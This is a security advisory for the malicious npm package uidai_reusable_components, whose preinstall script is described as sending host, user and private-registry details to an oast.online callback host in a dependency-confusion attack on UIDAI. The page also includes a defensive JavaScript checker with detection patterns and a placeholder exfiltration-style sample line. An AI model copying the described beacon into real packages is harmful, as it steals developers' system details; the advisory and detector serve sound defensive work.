Malicious package

uidai_reusable_components (npm)

Malicious code in uidai_reusable_components (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5910
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall uidai_reusable_components

What this malware does

On npm install, the preinstall lifecycle script in package.json executes an inline Node one-liner that collects the installer's hostname, OS username, NODE_ENV, current working directory, local IPv4 addresses (via ipconfig|findstr IPv4 on Windows or hostname -I on Linux), the configured npm registry URL (npm config get registry), and Windows USERDOMAIN / Unix id output. The collected data is URL-encoded and embedded as a subdomain label in an HTTP GET to *.d8ofndiplbq1d996mde0a9yukto9dm49e.oast.online, an Interactsh out-of-band callback host controlled by the package author. The package's own description states it is a 'PoC for dependency confusion' targeting the UIDAI (Aadhaar / India's national identity authority) internal namespace, and the harvested private npm registry URL is the canonical signal an attacker uses to confirm a dependency-confusion victim. The package ships no actual UI component functionality — its only effect on install is the exfiltration beacon.
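An install-time check for the behaviour described above, as an added example that is not part of the original advisory or of the package's code: it inspects a parsed package.json for install hooks that combine an inline Node one-liner, host enumeration, a registry lookup and an outbound call to an oast.online host. The rule patterns, function names and sample manifests are assumptions made for this example.

```javascript
// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristics for the behaviours listed in the advisory; the patterns are this example's own.
const RULES = [
  { id: 'inline-node', re: /\bnode\s+(-e|--eval|-p|--print)\b/, why: 'inline Node one-liner' },
  { id: 'host-recon', re: /os\.hostname|hostname\s+-I|ipconfig|USERDOMAIN|userInfo|whoami/, why: 'host/user enumeration' },
  { id: 'registry-probe', re: /npm\s+config\s+get\s+registry/, why: 'reads configured registry URL' },
  { id: 'network-call', re: /\bhttps?\.(get|request)\b|\bfetch\s*\(|\b(curl|wget|nslookup)\b/, why: 'outbound request at install time' },
  { id: 'oast-callback', re: /[a-z0-9-]+\.oast\.online\b/i, why: 'Interactsh callback host' },
];

// Returns one finding per (hook, rule) match in a parsed package.json object.
function auditManifest(pkg) {
  const scripts = (pkg && typeof pkg.scripts === 'object' && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    for (const rule of RULES) {
      if (rule.re.test(cmd)) findings.push({ hook, rule: rule.id, why: rule.why });
    }
  }
  return findings;
}

// Block-worthy when a hook calls an OAST host, or combines recon with a network call.
function isLikelyBeacon(findings) {
  const byHook = {};
  for (const f of findings) {
    byHook[f.hook] = byHook[f.hook] || new Set();
    byHook[f.hook].add(f.rule);
  }
  return Object.values(byHook).some(
    (r) => r.has('oast-callback') || (r.has('network-call') && (r.has('host-recon') || r.has('registry-probe')))
  );
}

// Constructed samples. The first is a non-functional stand-in shaped like the described script.
const SUSPECT = { name: 'constructed-suspect', scripts: {
  preinstall: "node -e \"collect(os.hostname(), 'npm config get registry'); http.get(label + '.placeholder.oast.online')\"",
} };
const NOISY = { name: 'constructed-noisy', scripts: { postinstall: "node -e \"console.log('thanks')\"" } };
const BENIGN = { name: 'constructed-benign', scripts: { postinstall: 'node scripts/build.js', test: 'jest' } };

for (const pkg of [SUSPECT, NOISY, BENIGN]) {
  const findings = auditManifest(pkg);
  console.log(pkg.name, isLikelyBeacon(findings) ? 'BLOCK' : 'ok', findings.map((f) => f.rule).join(','));
}
```

A single inline one-liner with no recon or network call is reported but not blocked, which keeps the check usable on packages that print a notice from postinstall.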

Malicious versions

5 flagged
0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6

Indicators of compromise (SHA-256)


Frequently asked questions

No. uidai_reusable_components on npm has been identified as a malicious package (versions 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006778, IN-MAL-2026-006782, IN-MAL-2026-006783, IN-MAL-2026-006781, IN-MAL-2026-006780


Credits

  • Amazon Inspector · finder
